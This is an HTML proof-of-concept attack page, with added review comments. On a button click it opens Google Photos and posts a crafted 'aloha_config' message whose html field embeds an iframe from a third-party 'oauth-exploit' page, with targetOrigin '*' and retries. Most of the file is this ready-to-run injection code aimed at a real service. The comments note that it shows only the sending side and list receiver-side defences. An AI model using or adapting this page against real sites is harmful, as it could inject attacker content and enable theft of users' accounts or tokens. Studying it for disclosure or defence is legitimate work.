attacker.html
<!DOCTYPE html>
<html>
<head>
<title>Photos postMessage Injection</title>
</head>
<body>
<h2>Click to launch attack</h2>
<button onclick="launch()">🚀 Launch</button>
<script>
/**
 * Proof-of-concept sender for a cross-origin postMessage test.
 *
 * Opens https://photos.google.com in a new window and, after a fixed delay,
 * posts one message of type "aloha_config" whose config.html field carries
 * iframe markup pointing at a third-party page.
 *
 * Takes no arguments and returns nothing; its effects are the window.open
 * call, the timers it schedules and the console output.
 *
 * NOTE(review): nothing on this page shows how (or whether) the receiving
 * document handles "aloha_config" messages, so the code here demonstrates
 * only the sending side. The receiver-side controls this pattern probes are:
 * compare event.origin against an allowlist before acting on event.data, and
 * never insert message-supplied strings into the DOM as HTML.
 */
function launch() {
// Handle to the opened window; every later step depends on it.
const popup = window.open("https://photos.google.com", "_blank");
// Payload: plain data object. Field names are taken as given by the author;
// their meaning to the receiver is not established by this file.
const msg = {
type: "aloha_config",
config: {
authUser: "0",
alohaHostPageUrl: "https://photos.google.com/",
// Sender-controlled markup. A receiver that rendered this value as HTML
// would be embedding content chosen by the sending page.
html: "<iframe src='https://musgaas.github.io/oauth-exploit/receiver.html'></iframe>",
marker: "📷 autoload test"
}
};
// Counts retries taken in the catch branch below.
let tries = 0;
function send() {
// Does nothing (silently) when window.open returned no handle or the
// window has since been closed.
if (popup && !popup.closed) {
try {
// targetOrigin "*" places no restriction on the origin of the receiving
// document, so the sender does not limit who receives the message.
popup.postMessage(msg, "*");
console.log("✅ Message sent");
} catch (e) {
// Reached only if postMessage throws: re-schedules send() one second
// later for up to 10 retries, then logs and stops. A send that does not
// throw is never repeated.
if (tries++ < 10) setTimeout(send, 1000);
else console.error("❌ Giving up.");
}
}
}
// First attempt runs 3 seconds after the click. Presumably this is to let the
// opened page load; the code does not check the window's load state.
setTimeout(send, 3000);
}
</script>
</body>
</html>